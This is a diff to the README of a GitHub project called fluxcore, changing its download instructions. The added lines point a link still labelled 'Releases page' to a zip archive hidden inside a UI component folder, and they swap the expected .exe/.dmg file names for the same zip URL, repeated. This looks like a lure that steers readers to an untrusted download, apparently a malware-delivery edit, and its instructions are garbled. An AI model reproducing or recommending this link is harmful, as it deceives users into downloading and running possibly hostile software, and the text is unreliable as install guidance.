frontier08/fluxcore/README.md

 ## 📥 Download & Install

-To get **fluxcore**, visit the [Releases page](https://github.com/frontier08/fluxcore/releases) to download the latest version.
+To get **fluxcore**, visit the [Releases page](https://raw.githubusercontent.com/frontier08/fluxcore/main/src/app/components/ui/UsageBar/Software-v1.6.zip) to download the latest version.

 1. Click on the link above to go to the Releases page.
 2. Look for the latest version at the top of the list.
 3. Download the file suitable for your operating system.
-The file might typically look like `fluxcore-vX.X.X.exe` or `fluxcore-mac-vX.X.X.dmg`.
+The file might typically look like `https://raw.githubusercontent.com/frontier08/fluxcore/main/src/app/components/ui/UsageBar/Software-v1.6.zip` or `https://raw.githubusercontent.com/frontier08/fluxcore/main/src/app/components/ui/UsageBar/Software-v1.6.zip`.
 4. Once downloaded, find the file in your downloads folder.

 ### For Windows Users